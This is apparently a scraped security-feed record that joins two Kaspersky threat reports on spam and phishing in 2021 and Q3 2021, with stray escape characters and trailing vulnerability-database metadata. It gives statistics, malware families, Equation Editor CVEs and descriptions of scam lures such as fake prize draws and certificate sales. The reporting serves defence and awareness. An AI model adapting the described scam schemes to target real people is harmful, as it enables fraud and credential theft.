We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)

## Statistics: spam

### Share of spam in mail traffic

On average, 45.56% of global mail traffic was spam in 2021.
The figure fluctuated over the course of the year.

_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_

We observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.

### Source of spam by country or region

As in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.

_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_

The Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.

### Malicious mail attachments

_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_

In 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total.
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.

#### Malware families

The attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same number of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (3.93%), which creates malicious tasks in Windows Task Scheduler.

_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_

The fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%.
Eighth place was taken by another exploited vulnerability in Equation Editor, [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.

_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_

The ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.

#### Countries and regions targeted by malicious mailings

In 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).

_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_

Germany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).

## Statistics: phishing

In 2021, our Anti-Phishing system blocked 253 365 212 phishing links.
In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.

### Map of phishing attacks

_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_

Users living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.

Mongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).

TOP 10 countries by share of users targeted in phishing attacks:

**Country** | **Share of attacked users***
---|---
Brazil | 12.39%
France | 12.21%
Portugal | 11.40%
Mongolia | 10.98%
Réunion | 10.97%
Brunei | 10.89%
Madagascar | 10.87%
Andorra | 10.79%
Australia | 10.74%
Ecuador | 10.73%

_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_

### Top-level domains

Most of the phishing websites blocked in 2021 used a .com domain name, as in 2020; the share of .com rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%).
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.

_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_

### Organizations mimicked in phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._

The demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating.
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.

_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_

On average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility.
We also observed another brief surge in phishing activity in the week from October 31 through November 6, 2021.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)

**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**

On average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)

**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**

A daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)

**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**

## Conclusion

As we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes — two of the year's main themes — were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.

The key trends in phishing attacks and scams are likely to continue into the coming year.
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given that remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.

_Source: Securelist, "Spam and phishing in 2021", published 2022-02-09, <https://securelist.com/spam-and-phishing-in-2021/105713/>. CVEs mentioned: CVE-2017-11882, CVE-2018-0802._
## Quarterly highlights

### Scamming championship: sports-related fraud

This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)

Scammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)

Soccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami.
The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)

"Nigerian prince" scammers also had a close eye on Q3's sporting fixtures. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)

Some messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November–December 2022, yet scammers are already inventing giveaways related to it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)

Among other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)

### Scam: get it yourself, share with friends

In Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date.
Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. 
Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. 
Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven official mobile app stores sometimes let malware sneak in. This quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. 
However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. 
In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. 
less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. 
These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. 
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. 
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. 
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 